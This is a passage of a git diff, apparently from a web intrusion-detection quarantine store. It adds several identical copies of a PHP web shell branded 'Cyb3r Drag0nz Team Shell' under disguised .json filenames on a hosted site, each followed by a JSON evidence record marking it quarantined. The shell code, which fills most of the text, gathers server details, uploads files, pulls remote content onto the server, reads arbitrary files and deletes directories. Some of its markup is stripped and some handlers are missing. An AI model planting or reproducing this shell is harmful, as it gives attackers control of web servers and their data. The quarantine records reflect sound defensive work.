+ Current Directory : $dir) { + if($dir == '' && $i == 0) { echo '/'; continue; } + if($dir == '') continue; + echo ''.$dir.'/'; + } + ?>
+ Directory Status: | Document Root: +
+ + +
+

Upload File

+
+

+

+ + + + + +

+ + + + +
+
+ +" . htmlspecialchars($target) . ""); + } else { + red("Failed to upload file!"); + } + } + elseif (isset($_POST['linknya']) && !empty($_POST['darilink']) && !empty($_POST['namalink'])) { + $target = $lokasi . "/" . $_POST['namalink']; + $data = @file_put_contents($target, @file_get_contents($_POST['darilink'])); + if ($data !== false) { + green("File uploaded from URL → " . htmlspecialchars($target) . ""); + } else { + red("Failed to upload from URL!"); + } + } +} + +// File viewer, delete, chmod, rename, edit actions (kept your original logic) +if (isset($_GET['fileloc'])) { + echo "

Viewing: " . htmlspecialchars($_GET['fileloc']) . "

"; + echo "
" . htmlspecialchars(@file_get_contents($_GET['fileloc'])) . "
"; + author(); +} + +// ... (your other action handlers for hapus, ubahmod, gantinama, edit go here - same as before) + +// Directory & File listing table (same structure as previous version) +echo ' + + + + + +'; + +foreach(scandir($path) as $dir) { + if(!is_dir($path."/".$dir) || $dir == '.' || $dir == '..') continue; + echo " + + + + + "; +} + +foreach(scandir($path) as $file) { + if(!is_file($path."/".$file)) continue; + $size = round(filesize($path."/".$file)/1024, 2) . " KB"; + echo " + + + + + "; +} + +echo '
NameSizePermissionsOptions
📁 ".$dir."--".statusnya($path."/".$dir)." +
+ + + + +
+
📄 ".$file."".$size."".statusnya($path."/".$file)." +
+ + + + +
+

'; + +author(); + +function statusnya($file) { + $statusnya = fileperms($file); + $ingfo = (($statusnya & 0xC000) == 0xC000) ? 's' : + ((($statusnya & 0xA000) == 0xA000) ? 'l' : + ((($statusnya & 0x8000) == 0x8000) ? '-' : 'u')); + + $ingfo .= (($statusnya & 0x0100) ? 'r' : '-'); + $ingfo .= (($statusnya & 0x0080) ? 'w' : '-'); + $ingfo .= (($statusnya & 0x0040) ? (($statusnya & 0x0800) ? 's' : 'x') : (($statusnya & 0x0800) ? 'S' : '-')); + $ingfo .= (($statusnya & 0x0020) ? 'r' : '-'); + $ingfo .= (($statusnya & 0x0010) ? 'w' : '-'); + $ingfo .= (($statusnya & 0x0008) ? (($statusnya & 0x0400) ? 's' : 'x') : (($statusnya & 0x0400) ? 'S' : '-')); + $ingfo .= (($statusnya & 0x0004) ? 'r' : '-'); + $ingfo .= (($statusnya & 0x0002) ? 'w' : '-'); + $ingfo .= (($statusnya & 0x0001) ? (($statusnya & 0x0200) ? 't' : 'x') : (($statusnya & 0x0200) ? 'T' : '-')); + + return $ingfo; +} +?> + + diff --git a/var/www/hosting/archlinexp.eu/www/yhajxaav.php.json.evidence.json b/var/www/hosting/archlinexp.eu/www/yhajxaav.php.json.evidence.json new file mode 100644 index 0000000..3169273 --- /dev/null +++ b/var/www/hosting/archlinexp.eu/www/yhajxaav.php.json.evidence.json @@ -0,0 +1,15 @@ +{ + "finding_ref": "4911", + "log_excerpt": "[quarantine] www.archlinexp.eu:yhajxaav.php.json -> quarantined (dest=/var/lib/web-hids/quarantine/var/www/hosting/archlinexp.eu/www/yhajxaav.php.json)", + "original_sha256": "f8434101acb434c1d6e61719fae10373a892218c4ed922e2b980cf8f3dc9f6c0", + "original_stat": { + "gid": 30037, + "mtime": 1783346934, + "size": 10657, + "uid": 20043 + }, + "rel_path": "yhajxaav.php.json", + "result": "quarantined", + "timestamp": "20260718T160204Z", + "vhost": "www.archlinexp.eu" +} diff --git a/var/www/hosting/archlinexp.eu/www/yhajxaav.php.txt.json b/var/www/hosting/archlinexp.eu/www/yhajxaav.php.txt.json new file mode 100644 index 0000000..79f80b9 --- /dev/null +++ b/var/www/hosting/archlinexp.eu/www/yhajxaav.php.txt.json @@ -0,0 +1,320 @@ + + + + Cyb3r Drag0nz Team Shell + + + + + +
+ Google +

Cyb3r Drag0nz Team Shell

+
+ +NONE" : "".$disfunc.""; + +function author() { + echo "

Cyb3r Drag0nz Team • Google Edition
"; + exit(); +} + +function cekdir() { + $lokasi = isset($_GET['path']) ? $_GET['path'] : getcwd(); + return is_writable($lokasi) ? "Writeable" : "Not Writeable"; +} + +function cekroot() { + return is_writable($_SERVER['DOCUMENT_ROOT']) ? "Writeable" : "Not Writeable"; +} + +function xrmdir($dir) { + $items = scandir($dir); + foreach ($items as $item) { + if ($item === '.' || $item === '..') continue; + $path = $dir.'/'.$item; + is_dir($path) ? xrmdir($path) : unlink($path); + } + rmdir($dir); +} + +function green($text) { echo "
".$text."
"; } +function red($text) { echo "
".$text."
"; } + +$path = isset($_GET['path']) ? $_GET['path'] : getcwd(); +$path = str_replace('\\','/',$path); +$dirs = explode('/',$path); +?> + +
+ Server :
+ System :
+ User :
+ PHP Version :
+ Disable Functions :
+ Current Directory : $dir) { + if($dir == '' && $i == 0) { echo '/'; continue; } + if($dir == '') continue; + echo ''.$dir.'/'; + } + ?>
+ Directory Status: | Document Root: +
+ + +
+

Upload File

+
+

+

+ + + + + +

+ + + + +
+
+ +" . htmlspecialchars($target) . ""); + } else { + red("Failed to upload file!"); + } + } + elseif (isset($_POST['linknya']) && !empty($_POST['darilink']) && !empty($_POST['namalink'])) { + $target = $lokasi . "/" . $_POST['namalink']; + $data = @file_put_contents($target, @file_get_contents($_POST['darilink'])); + if ($data !== false) { + green("File uploaded from URL → " . htmlspecialchars($target) . ""); + } else { + red("Failed to upload from URL!"); + } + } +} + +// File viewer, delete, chmod, rename, edit actions (kept your original logic) +if (isset($_GET['fileloc'])) { + echo "

Viewing: " . htmlspecialchars($_GET['fileloc']) . "

"; + echo "
" . htmlspecialchars(@file_get_contents($_GET['fileloc'])) . "
"; + author(); +} + +// ... (your other action handlers for hapus, ubahmod, gantinama, edit go here - same as before) + +// Directory & File listing table (same structure as previous version) +echo ' + + + + + +'; + +foreach(scandir($path) as $dir) { + if(!is_dir($path."/".$dir) || $dir == '.' || $dir == '..') continue; + echo " + + + + + "; +} + +foreach(scandir($path) as $file) { + if(!is_file($path."/".$file)) continue; + $size = round(filesize($path."/".$file)/1024, 2) . " KB"; + echo " + + + + + "; +} + +echo '
NameSizePermissionsOptions
📁 ".$dir."--".statusnya($path."/".$dir)." +
+ + + + +
+
📄 ".$file."".$size."".statusnya($path."/".$file)." +
+ + + + +
+

'; + +author(); + +function statusnya($file) { + $statusnya = fileperms($file); + $ingfo = (($statusnya & 0xC000) == 0xC000) ? 's' : + ((($statusnya & 0xA000) == 0xA000) ? 'l' : + ((($statusnya & 0x8000) == 0x8000) ? '-' : 'u')); + + $ingfo .= (($statusnya & 0x0100) ? 'r' : '-'); + $ingfo .= (($statusnya & 0x0080) ? 'w' : '-'); + $ingfo .= (($statusnya & 0x0040) ? (($statusnya & 0x0800) ? 's' : 'x') : (($statusnya & 0x0800) ? 'S' : '-')); + $ingfo .= (($statusnya & 0x0020) ? 'r' : '-'); + $ingfo .= (($statusnya & 0x0010) ? 'w' : '-'); + $ingfo .= (($statusnya & 0x0008) ? (($statusnya & 0x0400) ? 's' : 'x') : (($statusnya & 0x0400) ? 'S' : '-')); + $ingfo .= (($statusnya & 0x0004) ? 'r' : '-'); + $ingfo .= (($statusnya & 0x0002) ? 'w' : '-'); + $ingfo .= (($statusnya & 0x0001) ? (($statusnya & 0x0200) ? 't' : 'x') : (($statusnya & 0x0200) ? 'T' : '-')); + + return $ingfo; +} +?> + + diff --git a/var/www/hosting/archlinexp.eu/www/yhajxaav.php.txt.json.evidence.json b/var/www/hosting/archlinexp.eu/www/yhajxaav.php.txt.json.evidence.json new file mode 100644 index 0000000..78040a2 --- /dev/null +++ b/var/www/hosting/archlinexp.eu/www/yhajxaav.php.txt.json.evidence.json @@ -0,0 +1,15 @@ +{ + "finding_ref": "4932", + "log_excerpt": "[quarantine] www.archlinexp.eu:yhajxaav.php.txt.json -> quarantined (dest=/var/lib/web-hids/quarantine/var/www/hosting/archlinexp.eu/www/yhajxaav.php.txt.json)", + "original_sha256": "f8434101acb434c1d6e61719fae10373a892218c4ed922e2b980cf8f3dc9f6c0", + "original_stat": { + "gid": 30037, + "mtime": 1783346978, + "size": 10657, + "uid": 20043 + }, + "rel_path": "yhajxaav.php.txt.json", + "result": "quarantined", + "timestamp": "20260718T160204Z", + "vhost": "www.archlinexp.eu" +} diff --git a/var/www/hosting/archlinexp.eu/www/yhajxaav.php4.json b/var/www/hosting/archlinexp.eu/www/yhajxaav.php4.json new file mode 100644 index 0000000..79f80b9 --- /dev/null +++ b/var/www/hosting/archlinexp.eu/www/yhajxaav.php4.json @@ -0,0 +1,320 @@ + + + + Cyb3r Drag0nz Team Shell + + + + + +
+ Google +

Cyb3r Drag0nz Team Shell

+
+ +NONE" : "".$disfunc.""; + +function author() { + echo "

Cyb3r Drag0nz Team • Google Edition
"; + exit(); +} + +function cekdir() { + $lokasi = isset($_GET['path']) ? $_GET['path'] : getcwd(); + return is_writable($lokasi) ? "Writeable" : "Not Writeable"; +} + +function cekroot() { + return is_writable($_SERVER['DOCUMENT_ROOT']) ? "Writeable" : "Not Writeable"; +} + +function xrmdir($dir) { + $items = scandir($dir); + foreach ($items as $item) { + if ($item === '.' || $item === '..') continue; + $path = $dir.'/'.$item; + is_dir($path) ? xrmdir($path) : unlink($path); + } + rmdir($dir); +} + +function green($text) { echo "
".$text."
"; } +function red($text) { echo "
".$text."
"; } + +$path = isset($_GET['path']) ? $_GET['path'] : getcwd(); +$path = str_replace('\\','/',$path); +$dirs = explode('/',$path); +?> + +
+ Server :
+ System :
+ User :
+ PHP Version :
+ Disable Functions :
+ Current Directory : $dir) { + if($dir == '' && $i == 0) { echo '/'; continue; } + if($dir == '') continue; + echo ''.$dir.'/'; + } + ?>
+ Directory Status: | Document Root: +
+ + +
+

Upload File

+
+

+

+ + + + + +

+ + + + +
+
+ +" . htmlspecialchars($target) . ""); + } else { + red("Failed to upload file!"); + } + } + elseif (isset($_POST['linknya']) && !empty($_POST['darilink']) && !empty($_POST['namalink'])) { + $target = $lokasi . "/" . $_POST['namalink']; + $data = @file_put_contents($target, @file_get_contents($_POST['darilink'])); + if ($data !== false) { + green("File uploaded from URL → " . htmlspecialchars($target) . ""); + } else { + red("Failed to upload from URL!"); + } + } +} + +// File viewer, delete, chmod, rename, edit actions (kept your original logic) +if (isset($_GET['fileloc'])) { + echo "

Viewing: " . htmlspecialchars($_GET['fileloc']) . "

"; + echo "
" . htmlspecialchars(@file_get_contents($_GET['fileloc'])) . "
"; + author(); +} + +// ... (your other action handlers for hapus, ubahmod, gantinama, edit go here - same as before) + +// Directory & File listing table (same structure as previous version) +echo ' + + + + + +'; + +foreach(scandir($path) as $dir) { + if(!is_dir($path."/".$dir) || $dir == '.' || $dir == '..') continue; + echo " + + + + + "; +} + +foreach(scandir($path) as $file) { + if(!is_file($path."/".$file)) continue; + $size = round(filesize($path."/".$file)/1024, 2) . " KB"; + echo " + + + + + "; +} + +echo '
NameSizePermissionsOptions
📁 ".$dir."--".statusnya($path."/".$dir)." +
+ + + + +
+
📄 ".$file."".$size."".statusnya($path."/".$file)." +
+ + + + +
+

'; + +author(); + +function statusnya($file) { + $statusnya = fileperms($file); + $ingfo = (($statusnya & 0xC000) == 0xC000) ? 's' : + ((($statusnya & 0xA000) == 0xA000) ? 'l' : + ((($statusnya & 0x8000) == 0x8000) ? '-' : 'u')); + + $ingfo .= (($statusnya & 0x0100) ? 'r' : '-'); + $ingfo .= (($statusnya & 0x0080) ? 'w' : '-'); + $ingfo .= (($statusnya & 0x0040) ? (($statusnya & 0x0800) ? 's' : 'x') : (($statusnya & 0x0800) ? 'S' : '-')); + $ingfo .= (($statusnya & 0x0020) ? 'r' : '-'); + $ingfo .= (($statusnya & 0x0010) ? 'w' : '-'); + $ingfo .= (($statusnya & 0x0008) ? (($statusnya & 0x0400) ? 's' : 'x') : (($statusnya & 0x0400) ? 'S' : '-')); + $ingfo .= (($statusnya & 0x0004) ? 'r' : '-'); + $ingfo .= (($statusnya & 0x0002) ? 'w' : '-'); + $ingfo .= (($statusnya & 0x0001) ? (($statusnya & 0x0200) ? 't' : 'x') : (($statusnya & 0x0200) ? 'T' : '-')); + + return $ingfo; +} +?> + + diff --git a/var/www/hosting/archlinexp.eu/www/yhajxaav.php4.json.evidence.json b/var/www/hosting/archlinexp.eu/www/yhajxaav.php4.json.evidence.json new file mode 100644 index 0000000..c70f846 --- /dev/null +++ b/var/www/hosting/archlinexp.eu/www/yhajxaav.php4.json.evidence.json @@ -0,0 +1,15 @@ +{ + "finding_ref": "4875", + "log_excerpt": "[quarantine] www.archlinexp.eu:yhajxaav.php4.json -> quarantined (dest=/var/lib/web-hids/quarantine/var/www/hosting/archlinexp.eu/www/yhajxaav.php4.json)", + "original_sha256": "f8434101acb434c1d6e61719fae10373a892218c4ed922e2b980cf8f3dc9f6c0", + "original_stat": { + "gid": 30037, + "mtime": 1783346938, + "size": 10657, + "uid": 20043 + }, + "rel_path": "yhajxaav.php4.json", + "result": "quarantined", + "timestamp": "20260718T160204Z", + "vhost": "www.archlinexp.eu" +} diff --git a/var/www/hosting/archlinexp.eu/www/yhajxaav.php5.json b/var/www/hosting/archlinexp.eu/www/yhajxaav.php5.json new file mode 100644 index 0000000..79f80b9 --- /dev/null +++ b/var/www/hosting/archlinexp.eu/www/yhajxaav.php5.json @@ -0,0 +1,320 @@ + + + + Cyb3r Drag0nz Team Shell + + + + + +
+ Google +

Cyb3r Drag0nz Team Shell

+
+ +NONE" : "".$disfunc.""; + +function author() { + echo "

Cyb3r Drag0nz Team • Google Edition
"; + exit(); +} + +function cekdir() { + $lokasi = isset($_GET['path']) ? $_GET['path'] : getcwd(); + return is_writable($lokasi) ? "Writeable" : "Not Writeable"; +} + +function cekroot() { + return is_writable($_SERVER['DOCUMENT_ROOT']) ? "Writeable" : "Not Writeable"; +} + +function xrmdir($dir) { + $items = scandir($dir); + foreach ($items as $item) { + if ($item === '.' || $item === '..') continue; + $path = $dir.'/'.$item; + is_dir($path) ? xrmdir($path) : unlink($path); + } + rmdir($dir); +} + +function green($text) { echo "
".$text."
"; } +function red($text) { echo "
".$text."
"; } + +$path = isset($_GET['path']) ? $_GET['path'] : getcwd(); +$path = str_replace('\\','/',$path); +$dirs = explode('/',$path); +?> + +
+ Server :
+ System :
+ User :
+ PHP Version :
+ Disable Functions :
+ Current Directory : $dir) { + if($dir == '' && $i == 0) { echo '/'; continue; } + if($dir == '') continue; + echo ''.$dir.'/'; + } + ?>
+ Directory Status: | Document Root: +
+ + +
+

Upload File

+
+

+

+ + + + + +

+ + + + +
+
+ +" . htmlspecialchars($target) . ""); + } else { + red("Failed to upload file!"); + } + } + elseif (isset($_POST['linknya']) && !empty($_POST['darilink']) && !empty($_POST['namalink'])) { + $target = $lokasi . "/" . $_POST['namalink']; + $data = @file_put_contents($target, @file_get_contents($_POST['darilink'])); + if ($data !== false) { + green("File uploaded from URL → " . htmlspecialchars($target) . ""); + } else { + red("Failed to upload from URL!"); + } + } +} + +// File viewer, delete, chmod, rename, edit actions (kept your original logic) +if (isset($_GET['fileloc'])) { + echo "

Viewing: " . htmlspecialchars($_GET['fileloc']) . "

"; + echo "
" . htmlspecialchars(@file_get_contents($_GET['fileloc'])) . "
"; + author(); +} + +// ... (your other action handlers for hapus, ubahmod, gantinama, edit go here - same as before) + +// Directory & File listing table (same structure as previous version) +echo ' + + + + + +'; + +foreach(scandir($path) as $dir) { + if(!is_dir($path."/".$dir) || $dir == '.' || $dir == '..') continue; + echo " + + + + + "; +} + +foreach(scandir($path) as $file) { + if(!is_file($path."/".$file)) continue; + $size = round(filesize($path."/".$file)/1024, 2) . " KB"; + echo " + + + + + "; +} + +echo '
NameSizePermissionsOptions
📁 ".$dir."--".statusnya($path."/".$dir)." +
+ + + + +
+
📄 ".$file."".$size."".statusnya($path."/".$file)." +
+ + + + +
+

'; + +author(); + +function statusnya($file) { + $statusnya = fileperms($file); + $ingfo = (($statusnya & 0xC000) == 0xC000) ? 's' : + ((($statusnya & 0xA000) == 0xA000) ? 'l' : + ((($statusnya & 0x8000) == 0x8000) ? '-' : 'u')); + + $ingfo .= (($statusnya & 0x0100) ? 'r' : '-'); + $ingfo .= (($statusnya & 0x0080) ? 'w' : '-'); + $ingfo .= (($statusnya & 0x0040) ? (($statusnya & 0x0800) ? 's' : 'x') : (($statusnya & 0x0800) ? 'S' : '-')); + $ingfo .= (($statusnya & 0x0020) ? 'r' : '-'); + $ingfo .= (($statusnya & 0x0010) ? 'w' : '-'); + $ingfo .= (($statusnya & 0x0008) ? (($statusnya & 0x0400) ? 's' : 'x') : (($statusnya & 0x0400) ? 'S' : '-')); + $ingfo .= (($statusnya & 0x0004) ? 'r' : '-'); + $ingfo .= (($statusnya & 0x0002) ? 'w' : '-'); + $ingfo .= (($statusnya & 0x0001) ? (($statusnya & 0x0200) ? 't' : 'x') : (($statusnya & 0x0200) ? 'T' : '-')); + + return $ingfo; +} +?> + + diff --git a/var/www/hosting/archlinexp.eu/www/yhajxaav.php5.json.evidence.json b/var/www/hosting/archlinexp.eu/www/yhajxaav.php5.json.evidence.json new file mode 100644 index 0000000..4f6b99a --- /dev/null +++ b/var/www/hosting/archlinexp.eu/www/yhajxaav.php5.json.evidence.json @@ -0,0 +1,15 @@ +{ + "finding_ref": "4850", + "log_excerpt": "[quarantine] www.archlinexp.eu:yhajxaav.php5.json -> quarantined (dest=/var/lib/web-hids/quarantine/var/www/hosting/archlinexp.eu/www/yhajxaav.php5.json)", + "original_sha256": "f8434101acb434c1d6e61719fae10373a892218c4ed922e2b980cf8f3dc9f6c0", + "original_stat": { + "gid": 30037, + "mtime": 1783346937, + "size": 10657, + "uid": 20043 + }, + "rel_path": "yhajxaav.php5.json", + "result": "quarantined", + "timestamp": "20260718T160204Z", + "vhost": "www.archlinexp.eu" +} diff --git a/var/www/hosting/archlinexp.eu/www/yhajxaav.phtml.json b/var/www/hosting/archlinexp.eu/www/yhajxaav.phtml.json new file mode 100644 index 0000000..79f80b9 --- /dev/null +++ b/var/www/hosting/archlinexp.eu/www/yhajxaav.phtml.json @@ -0,0 +1,320 @@ + + + + Cyb3r Drag0nz Team Shell + + + + + +
+ Google +

Cyb3r Drag0nz Team Shell

+
+ +NONE" : "".$disfunc.""; + +function author() { + echo "

Cyb3r Drag0nz Team • Google Edition
"; + exit(); +} + +function cekdir() { + $lokasi = isset($_GET['path']) ? $_GET['path'] : getcwd(); + return is_writable($lokasi) ? "Writeable" : "Not Writeable"; +} + +function cekroot() { + return is_writable($_SERVER['DOCUMENT_ROOT']) ? "Writeable" : "Not Writeable"; +} + +function xrmdir($dir) { + $items = scandir($dir); + foreach ($items as $item) { + if ($item === '.' || $item === '..') continue; + $path = $dir.'/'.$item; + is_dir($path) ? xrmdir($path) : unlink($path); + } + rmdir($dir); +} + +function green($text) { echo "
".$text."
"; } +function red($text) { echo "
".$text."
"; } + +$path = isset($_GET['path']) ? $_GET['path'] : getcwd(); +$path = str_replace('\\','/',$path); +$dirs = explode('/',$path); +?> + +
+ Server :
+ System :
+ User :
+ PHP Version :
+ Disable Functions :
+ Current Directory : $dir) { + if($dir == '' && $i == 0) { echo '/'; continue; } + if($dir == '') continue; + echo ''.$dir.'/'; + } + ?>
+ Directory Status: | Document Root: +
+ + +
+

Upload File

+
+

+

+ + + + + +

+ + + + +
+
+ +" . htmlspecialchars($target) . ""); + } else { + red("Failed to upload file!"); + } + } + elseif (isset($_POST['linknya']) && !empty($_POST['darilink']) && !empty($_POST['namalink'])) { + $target = $lokasi . "/" . $_POST['namalink']; + $data = @file_put_contents($target, @file_get_contents($_POST['darilink'])); + if ($data !== false) { + green("File uploaded from URL → " . htmlspecialchars($target) . ""); + } else { + red("Failed to upload from URL!"); + } + } +} + +// File viewer, delete, chmod, rename, edit actions (kept your original logic) +if (isset($_GET['fileloc'])) { + echo "

Viewing: " . htmlspecialchars($_GET['fileloc']) . "

"; + echo "
" . htmlspecialchars(@file_get_contents($_GET['fileloc'])) . "
"; + author(); +} + +// ... (your other action handlers for hapus, ubahmod, gantinama, edit go here - same as before) + +// Directory & File listing table (same structure as previous version) +echo ' + + + + + +'; + +foreach(scandir($path) as $dir) { + if(!is_dir($path."/".$dir) || $dir == '.' || $dir == '..') continue; + echo " + + + + + "; +} + +foreach(scandir($path) as $file) { + if(!is_file($path."/".$file)) continue; + $size = round(filesize($path."/".$file)/1024, 2) . " KB"; + echo " + + + + + "; +} + +echo '
NameSizePermissionsOptions
📁 ".$dir."--".statusnya($path."/".$dir)." +
+ + + + +
+
📄 ".$file."".$size."".statusnya($path."/".$file)." +
+ + + + +
+

'; + +author(); + +function statusnya($file) { + $statusnya = fileperms($file); + $ingfo = (($statusnya & 0xC000) == 0xC000) ? 's' : + ((($statusnya & 0xA000) == 0xA000) ? 'l' : + ((($statusnya & 0x8000) == 0x8000) ? '-' : 'u')); + + $ingfo .= (($statusnya & 0x0100) ? 'r' : '-'); + $ingfo .= (($statusnya & 0x0080) ? 'w' : '-'); + $ingfo .= (($statusnya & 0x0040) ? (($statusnya & 0x0800) ? 's' : 'x') : (($statusnya & 0x0800) ? 'S' : '-')); + $ingfo .= (($statusnya & 0x0020) ? 'r' : '-'); + $ingfo .= (($statusnya & 0x0010) ? 'w' : '-'); + $ingfo .= (($statusnya & 0x0008) ? (($statusnya & 0x0400) ? 's' : 'x') : (($statusnya & 0x0400) ? 'S' : '-')); + $ingfo .= (($statusnya & 0x0004) ? 'r' : '-'); + $ingfo .= (($statusnya & 0x0002) ? 'w' : '-'); + $ingfo .= (($statusnya & 0x0001) ? (($statusnya & 0x0200) ? 't' : 'x') : (($statusnya & 0x0200) ? 'T' : '-')); + + return $ingfo; +} +?> + + diff --git a/var/www/hosting/archlinexp.eu/www/yhajxaav.phtml.json.evidence.json b/var/www/hosting/archlinexp.eu/www/yhajxaav.phtml.json.evidence.json new file mode 100644 index 0000000..2e4ee4f --- /dev/null +++ b/var/www/hosting/archlinexp.eu/www/yhajxaav.phtml.json.evidence.json @@ -0,0 +1,15 @@ +{ + "finding_ref": "4944", + "log_excerpt": "[quarantine] www.archlinexp.eu:yhajxaav.phtml.json -> quarantined (dest=/var/lib/web-hids/quarantine/var/www/hosting/archlinexp.eu/www/yhajxaav.phtml.json)", + "original_sha256": "f8434101acb434c1d6e61719fae10373a892218c4ed922e2b980cf8f3dc9f6c0", + "original_stat": { + "gid": 30037, + "mtime": 1783346936, + "size": 10657, + "uid": 20043 + }, + "rel_path": "yhajxaav.phtml.json", + "result": "quarantined", + "timestamp": "20260718T160204Z", + "vhost": "www.archlinexp.eu" +}